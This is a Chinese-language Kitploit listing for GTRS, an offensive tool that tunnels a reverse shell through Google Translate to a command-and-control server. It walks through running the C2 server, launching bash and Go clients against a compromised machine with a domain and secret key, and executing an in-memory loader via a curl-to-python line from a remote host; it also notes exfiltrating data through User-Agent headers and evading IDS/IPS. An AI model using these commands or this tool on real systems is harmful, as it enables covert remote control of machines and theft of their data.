Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
GTRS — GTRS - Google翻译反向Shell | Kitploit
工具/GitHubGitHub/mthbernardes/gtrs
IDS/IPS规避数据泄露命令与控制红队远程访问工具
GitHubmthbernardes/gtrs

GTRS

GTRS - Google翻译反向Shell

查看仓库
6249941年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GTRS - 谷歌翻译反向Shell

该工具利用 谷歌翻译 作为代理,向被感染机器发送任意命令。

root@kitploit:~
[被感染机器] ==HTTPS==> [谷歌翻译] ==HTTP==> [C2] 

环境配置

首先你需要一台VPS和一个域名,域名可以在 Freenom 免费获取。

服务器端

在你的VPS上运行 server.py

root@kitploit:~
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062

它会生成一个密钥,该密钥将在客户端使用。

客户端 bash

在能访问 谷歌翻译 的计算机上运行客户端,提供域名和服务器生成的密钥。

root@kitploit:~
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

现在你拥有了一个使用命名管道文件的交互式Shell,是的,你可以 cd 进入目录。

客户端 Go

你首先需要 下载 二进制文件或自行编译,然后操作过程与bash客户端相同,

root@kitploit:~
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

使用此客户端,你可以在Linux、Mac和Windows上运行,但该客户端目前还不具备交互式Shell。

ELF内存执行(仅限Linux)

在阅读了这篇 博客文章 之后,我对脚本 inmemory-linux.py 进行了简单修改以实现GTRS的内存执行,只需修改脚本中的主机和密钥,然后将其托管到服务器上并用curl执行。

root@kitploit:~
curl https://yourserver.ml/inmemory-linux.py | python

或者你也可以采用 YouTube 的方式来托管该脚本。

概念验证

CODE_IS_CHEAP_SHOW_ME_THE_DEMO

已知问题

  • 谷歌翻译不转发POST数据,因此服务器可接收的数据量有限,例如,你可能无法读取像.bashrc这样的大文件。 通过使用User-Agent头发送数据已修复此问题。
  • 客户端脚本可以在Mac和Linux上运行,但在Linux上需要安装xmllint,该工具位于libxml2-utils包中。 问题已修复,现在客户端也使用Go编写。
  • 这并不是一个问题,只是我不确定谷歌翻译是否存在频率限制。
下载工具